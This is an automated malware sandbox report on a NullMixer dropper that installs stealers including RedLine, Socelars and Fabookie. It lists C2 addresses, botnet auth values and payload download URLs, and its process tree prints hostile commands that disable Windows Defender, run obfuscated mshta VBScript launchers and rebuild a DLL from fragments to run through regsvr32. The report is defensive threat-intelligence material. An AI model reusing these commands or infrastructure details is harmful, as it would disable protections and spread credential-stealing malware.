fabookie | 3c4448ece87d915a3be7c71f4f6c99828849ae0aae5f26a3eb46ca5bd7dc7171

Analysis

max time kernel
22s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
04-10-2022 20:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exe
Size

4.2MB
MD5

56334939ffc01e787bbbd4d1f112eda2
SHA1

ee20e014dd07a926f50e80fda2e8e9d657afce04
SHA256

3c4448ece87d915a3be7c71f4f6c99828849ae0aae5f26a3eb46ca5bd7dc7171
SHA512

ee1635c7b6563fa6dfb2c6e704b928be7b2e2316871a2373b87f1c880ca80165eb83f79d1aebbff422f7b47ebd0493ededbe96ecdc724f3264f20ace5ed2c81f
SSDEEP

98304:JcZlndcxBPesieiawSduvifCT7JsBxrWBck+ogHryTZ+4:JcZJdcJiaHtafJsTCWjHrMZ+4

Malware Config

Extracted

Family

nullmixer

http://marianu.xyz/

Extracted

Family

privateloader

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

redline

Botnet

media0121

91.121.67.60:23325

Attributes

auth_value
e37d5065561884bb54c8ed1baa6de446

Extracted

Family

redline

Botnet

newjust

135.181.129.119:4805

Attributes

auth_value
b69102cdbd4afe2d3159f88fb6dac731

Extracted

Family

redline

Botnet

nam6.9

103.89.90.61:34589

Attributes

auth_value
4fdd47c99ace4ac44dfd0a23529bf5ac

Extracted

Family

redline

Botnet

PremiumCloud#41

151.80.89.227:45878

Attributes

auth_value
6011f107082889840844bd9a1730558b

Extracted

Family

redline

Botnet

79.110.62.196:35726

Attributes

auth_value
4b711fa6f9a5187b40500266349c0baf

Signatures

Detect Fabookie payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03f86467d7fa.exe	family_fabookie
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03f86467d7fa.exe	family_fabookie

Detects Smokeloader packer 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4372-301-0x0000000000550000-0x0000000000559000-memory.dmp	family_smokeloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1880	1356	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5496	1356	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2360-256-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/2360-257-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/692-267-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/692-268-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1364-356-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral2/memory/5792-387-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral2/memory/5736-388-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03379d13a2633.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03379d13a2633.exe	family_socelars

OnlyLogger payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3724-298-0x0000000000660000-0x00000000006AC000-memory.dmp	family_onlylogger
behavioral2/memory/3724-299-0x0000000000400000-0x000000000058E000-memory.dmp	family_onlylogger
behavioral2/memory/3724-327-0x0000000000400000-0x000000000058E000-memory.dmp	family_onlylogger

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\libcurlpp.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 21 IoCs

Processes:

setup_installer.exesetup_install.exeMon03023f5df7427c80a.exeMon03d03855b9f79.exeMon03ad1a39db.exeMon0360fe2e8b9975052.exeMon03e7fcca26693c.exeMon03e7502f15ce55006.exeMon037314babff.exeMon03ec84cbb8ea.exeMon036894b6d48ff5f.exeMon03d03855b9f79.tmpMon03f945a18a7fcd.exeMon03d03855b9f79.exeMon03a60a342de03b.exeMon03f86467d7fa.exeMon03d03855b9f79.tmpMon0360fe2e8b9975052.exeTrustedInstaller.exeWerFault.exeMon03ad1a39db.exe

pid	process
1760	setup_installer.exe
1476	setup_install.exe
572	Mon03023f5df7427c80a.exe
1868	Mon03d03855b9f79.exe
3776	Mon03ad1a39db.exe
380	Mon0360fe2e8b9975052.exe
4400	Mon03e7fcca26693c.exe
4372	Mon03e7502f15ce55006.exe
4864	Mon037314babff.exe
1876	Mon03ec84cbb8ea.exe
2264	Mon036894b6d48ff5f.exe
3716	Mon03d03855b9f79.tmp
3724	Mon03f945a18a7fcd.exe
2436	Mon03d03855b9f79.exe
2028	Mon03a60a342de03b.exe
3728	Mon03f86467d7fa.exe
2252	Mon03d03855b9f79.tmp
2568	Mon0360fe2e8b9975052.exe
1504	TrustedInstaller.exe
3936	WerFault.exe
2360	Mon03ad1a39db.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/2404-345-0x0000000140000000-0x000000014060D000-memory.dmp	vmprotect
behavioral2/memory/732-351-0x0000000000400000-0x0000000000BD4000-memory.dmp	vmprotect
behavioral2/memory/5196-380-0x0000000140000000-0x000000014060D000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exesetup_installer.exeMon03d03855b9f79.tmpMon0360fe2e8b9975052.exevb1m0SfC5dvEY5vw99nL0xKI.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Mon03d03855b9f79.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Mon0360fe2e8b9975052.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	vb1m0SfC5dvEY5vw99nL0xKI.exe

Loads dropped DLL 8 IoCs

Processes:

setup_install.exeMon03d03855b9f79.tmpMon03d03855b9f79.tmp

pid	process
1476	setup_install.exe
1476	setup_install.exe
1476	setup_install.exe
1476	setup_install.exe
1476	setup_install.exe
1476	setup_install.exe
3716	Mon03d03855b9f79.tmp
2252	Mon03d03855b9f79.tmp

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 ip-api.com
79 freegeoip.app
90 ipinfo.io
91 ipinfo.io
92 ipinfo.io
213 ipinfo.io
215 ipinfo.io
238 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of SetThreadContext 1 IoCs

Processes:

Mon03ad1a39db.exe

description pid process target process

PID 3776 set thread context of 2360 3776 Mon03ad1a39db.exe Mon03ad1a39db.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
29	ip-api.com
79	freegeoip.app
90	ipinfo.io
91	ipinfo.io
92	ipinfo.io
213	ipinfo.io
215	ipinfo.io
238	ipinfo.io

description	pid	process	target process
PID 3776 set thread context of 2360	3776	Mon03ad1a39db.exe	Mon03ad1a39db.exe

Program crash 31 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4184	1476	WerFault.exe	setup_install.exe
4840	3724	WerFault.exe	Mon03f945a18a7fcd.exe
3936	3724	WerFault.exe	Mon03f945a18a7fcd.exe
732	3724	WerFault.exe	Mon03f945a18a7fcd.exe
3132	3724	WerFault.exe	Mon03f945a18a7fcd.exe
1652	3724	WerFault.exe	Mon03f945a18a7fcd.exe
2220	3724	WerFault.exe	Mon03f945a18a7fcd.exe
1520	2404	WerFault.exe	XAaTGIT5bCqlJvQzxr33BADm.exe
3104	3724	WerFault.exe	Mon03f945a18a7fcd.exe
4404	3568	WerFault.exe	tCcfL67DWQ3jvCf7EXi78Kab.exe
4620	3724	WerFault.exe	Mon03f945a18a7fcd.exe
2404	3568	WerFault.exe	tCcfL67DWQ3jvCf7EXi78Kab.exe
1084	3724	WerFault.exe	Mon03f945a18a7fcd.exe
3084	2264	WerFault.exe	rundll32.exe
1520	3568	WerFault.exe	tCcfL67DWQ3jvCf7EXi78Kab.exe
4372	3568	WerFault.exe	tCcfL67DWQ3jvCf7EXi78Kab.exe
4836	3568	WerFault.exe	tCcfL67DWQ3jvCf7EXi78Kab.exe
5544	3568	WerFault.exe	tCcfL67DWQ3jvCf7EXi78Kab.exe
5632	5196	WerFault.exe	S1MYpaMwbupVWTAyQ7su3fsP.exe
5952	3568	WerFault.exe	tCcfL67DWQ3jvCf7EXi78Kab.exe
6120	1112	WerFault.exe	pLWX3mnWQDhbtM1g7kNauGL4.exe
4580	1532	WerFault.exe	0fug0g9k8dmRiy0KJjAehHwy.exe
2320	1112	WerFault.exe	pLWX3mnWQDhbtM1g7kNauGL4.exe
1520	1112	WerFault.exe	pLWX3mnWQDhbtM1g7kNauGL4.exe
4464	3568	WerFault.exe	tCcfL67DWQ3jvCf7EXi78Kab.exe
4268	1428	WerFault.exe	rundll32.exe
5336	1112	WerFault.exe	pLWX3mnWQDhbtM1g7kNauGL4.exe
5664	1112	WerFault.exe	pLWX3mnWQDhbtM1g7kNauGL4.exe
6056	4656	WerFault.exe	f2t_I9A1XzWfDkYL9jVqaTsW.exe
2508	1112	WerFault.exe	pLWX3mnWQDhbtM1g7kNauGL4.exe
5432	1112	WerFault.exe	pLWX3mnWQDhbtM1g7kNauGL4.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4772 schtasks.exe
1084 schtasks.exe
5304 schtasks.exe
1884 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4688 taskkill.exe
4812 taskkill.exe

pid	process
4772	schtasks.exe
1084	schtasks.exe
5304	schtasks.exe
1884	schtasks.exe

pid	process
4688	taskkill.exe
4812	taskkill.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	222	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	334	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

4092 powershell.exe
4092 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
4092 powershell.exe
4092 powershell.exe

pid	process
4092	powershell.exe
4092	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
4092	powershell.exe
4092	powershell.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exepowershell.exeMon03ec84cbb8ea.exeMon03e7fcca26693c.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	540	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	1876	Mon03ec84cbb8ea.exe
Token: SeDebugPrivilege	4400	Mon03e7fcca26693c.exe
Token: SeCreateTokenPrivilege	3936	WerFault.exe
Token: SeAssignPrimaryTokenPrivilege	3936	WerFault.exe
Token: SeLockMemoryPrivilege	3936	WerFault.exe
Token: SeIncreaseQuotaPrivilege	3936	WerFault.exe
Token: SeMachineAccountPrivilege	3936	WerFault.exe
Token: SeTcbPrivilege	3936	WerFault.exe
Token: SeSecurityPrivilege	3936	WerFault.exe
Token: SeTakeOwnershipPrivilege	3936	WerFault.exe
Token: SeLoadDriverPrivilege	3936	WerFault.exe
Token: SeSystemProfilePrivilege	3936	WerFault.exe
Token: SeSystemtimePrivilege	3936	WerFault.exe
Token: SeProfSingleProcessPrivilege	3936	WerFault.exe
Token: SeIncBasePriorityPrivilege	3936	WerFault.exe
Token: SeCreatePagefilePrivilege	3936	WerFault.exe
Token: SeCreatePermanentPrivilege	3936	WerFault.exe
Token: SeBackupPrivilege	3936	WerFault.exe
Token: SeRestorePrivilege	3936	WerFault.exe
Token: SeShutdownPrivilege	3936	WerFault.exe
Token: SeDebugPrivilege	3936	WerFault.exe
Token: SeAuditPrivilege	3936	WerFault.exe
Token: SeSystemEnvironmentPrivilege	3936	WerFault.exe
Token: SeChangeNotifyPrivilege	3936	WerFault.exe
Token: SeRemoteShutdownPrivilege	3936	WerFault.exe
Token: SeUndockPrivilege	3936	WerFault.exe
Token: SeSyncAgentPrivilege	3936	WerFault.exe
Token: SeEnableDelegationPrivilege	3936	WerFault.exe
Token: SeManageVolumePrivilege	3936	WerFault.exe
Token: SeImpersonatePrivilege	3936	WerFault.exe
Token: SeCreateGlobalPrivilege	3936	WerFault.exe
Token: 31	3936	WerFault.exe
Token: 32	3936	WerFault.exe
Token: 33	3936	WerFault.exe
Token: 34	3936	WerFault.exe
Token: 35	3936	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 5072 wrote to memory of 1760	5072	3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exe	setup_installer.exe
PID 5072 wrote to memory of 1760	5072	3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exe	setup_installer.exe
PID 5072 wrote to memory of 1760	5072	3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exe	setup_installer.exe
PID 1760 wrote to memory of 1476	1760	setup_installer.exe	setup_install.exe
PID 1760 wrote to memory of 1476	1760	setup_installer.exe	setup_install.exe
PID 1760 wrote to memory of 1476	1760	setup_installer.exe	setup_install.exe
PID 1476 wrote to memory of 4888	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4888	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4888	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 3088	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 3088	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 3088	1476	setup_install.exe	cmd.exe
PID 4888 wrote to memory of 540	4888	cmd.exe	powershell.exe
PID 4888 wrote to memory of 540	4888	cmd.exe	powershell.exe
PID 4888 wrote to memory of 540	4888	cmd.exe	powershell.exe
PID 3088 wrote to memory of 4092	3088	cmd.exe	powershell.exe
PID 3088 wrote to memory of 4092	3088	cmd.exe	powershell.exe
PID 3088 wrote to memory of 4092	3088	cmd.exe	powershell.exe
PID 1476 wrote to memory of 3980	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 3980	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 3980	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4536	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4536	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4536	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4328	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4328	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4328	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4816	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4816	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4816	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 2180	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 2180	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 2180	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4260	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4260	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4260	1476	setup_install.exe	cmd.exe
PID 3980 wrote to memory of 572	3980	cmd.exe	Mon03023f5df7427c80a.exe
PID 3980 wrote to memory of 572	3980	cmd.exe	Mon03023f5df7427c80a.exe
PID 3980 wrote to memory of 572	3980	cmd.exe	Mon03023f5df7427c80a.exe
PID 1476 wrote to memory of 2220	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 2220	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 2220	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 968	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 968	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 968	1476	setup_install.exe	cmd.exe
PID 4816 wrote to memory of 1868	4816	cmd.exe	Mon03d03855b9f79.exe
PID 4816 wrote to memory of 1868	4816	cmd.exe	Mon03d03855b9f79.exe
PID 4816 wrote to memory of 1868	4816	cmd.exe	Mon03d03855b9f79.exe
PID 4536 wrote to memory of 3776	4536	cmd.exe	Mon03ad1a39db.exe
PID 4536 wrote to memory of 3776	4536	cmd.exe	Mon03ad1a39db.exe
PID 4536 wrote to memory of 3776	4536	cmd.exe	Mon03ad1a39db.exe
PID 1476 wrote to memory of 3368	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 3368	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 3368	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4856	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4856	1476	setup_install.exe	cmd.exe
PID 1476 wrote to memory of 4856	1476	setup_install.exe	cmd.exe
PID 4260 wrote to memory of 380	4260	cmd.exe	Mon0360fe2e8b9975052.exe
PID 4260 wrote to memory of 380	4260	cmd.exe	Mon0360fe2e8b9975052.exe
PID 4260 wrote to memory of 380	4260	cmd.exe	Mon0360fe2e8b9975052.exe
PID 968 wrote to memory of 4400	968	cmd.exe	Mon03e7fcca26693c.exe
PID 968 wrote to memory of 4400	968	cmd.exe	Mon03e7fcca26693c.exe
PID 4328 wrote to memory of 4372	4328	cmd.exe	Mon03e7502f15ce55006.exe
PID 4328 wrote to memory of 4372	4328	cmd.exe	Mon03e7502f15ce55006.exe

C:\Users\Admin\AppData\Local\Temp\3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exe
"C:\Users\Admin\AppData\Local\Temp\3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5072

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1760

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:3088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon037314babff.exe
4⤵
PID:2220

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon037314babff.exe
Mon037314babff.exe
5⤵
- Executes dropped EXE
PID:4864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03b269e8868.exe
4⤵
PID:3516

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03b269e8868.exe
Mon03b269e8868.exe
5⤵
PID:1504

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03b269e8868.exe
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03b269e8868.exe
6⤵
PID:692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03f86467d7fa.exe
4⤵
PID:3964

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03f86467d7fa.exe
Mon03f86467d7fa.exe
5⤵
- Executes dropped EXE
PID:3728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03a60a342de03b.exe
4⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03a60a342de03b.exe
Mon03a60a342de03b.exe
5⤵
- Executes dropped EXE
PID:2028

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCripT:ClOSE( CreAteOBJECt( "WScRipt.SHELL" ).RUn( "cMD.eXE /Q /c tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03a60a342de03b.exe"" > 7BjXD.exe && sTArT 7BJXD.exe /p~M~CW2_mD2AF42UpY~3pe & IF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03a60a342de03b.exe"" ) do taskkill -im ""%~NxV"" -f ",0, tRUE))
6⤵
PID:3152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03a60a342de03b.exe" > 7BjXD.exe && sTArT 7BJXD.exe /p~M~CW2_mD2AF42UpY~3pe & IF "" == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03a60a342de03b.exe" ) do taskkill -im "%~NxV" -f
7⤵
PID:5016

C:\Users\Admin\AppData\Local\Temp\7BjXD.exe
7BJXD.exe /p~M~CW2_mD2AF42UpY~3pe
8⤵
PID:3844

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCripT:ClOSE( CreAteOBJECt( "WScRipt.SHELL" ).RUn( "cMD.eXE /Q /c tYpe ""C:\Users\Admin\AppData\Local\Temp\7BjXD.exe"" > 7BjXD.exe && sTArT 7BJXD.exe /p~M~CW2_mD2AF42UpY~3pe & IF ""/p~M~CW2_mD2AF42UpY~3pe "" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\7BjXD.exe"" ) do taskkill -im ""%~NxV"" -f ",0, tRUE))
9⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Local\Temp\7BjXD.exe" > 7BjXD.exe && sTArT 7BJXD.exe /p~M~CW2_mD2AF42UpY~3pe & IF "/p~M~CW2_mD2AF42UpY~3pe " == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\7BjXD.exe" ) do taskkill -im "%~NxV" -f
10⤵
PID:1300

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCrIPt: ClOSe( cREateoBJeCT ("wscriPt.ShEll" ). RUn( "Cmd.ExE /R EChO | set /p = ""MZ"" >EPiJP.N_X & CoPy /y /b EPIJP.N_X + 6_0aPYO.YTM+ NbV8xD.C +Z_1m19Q.JT + dukZV.4 +kHVi675.90T + FZGAJWlW.L XAYJ3L~.y& stArt regsvr32 .\XAYJ3L~.Y -s " ,0,tRuE ) )
9⤵
PID:5000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EChO | set /p = "MZ" >EPiJP.N_X & CoPy /y /b EPIJP.N_X+ 6_0aPYO.YTM+ NbV8xD.C +Z_1m19Q.JT + dukZV.4+kHVi675.90T + FZGAJWlW.L XAYJ3L~.y& stArt regsvr32 .\XAYJ3L~.Y -s
10⤵
PID:448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EChO "
11⤵
PID:3196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>EPiJP.N_X"
11⤵
PID:3684

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 .\XAYJ3L~.Y -s
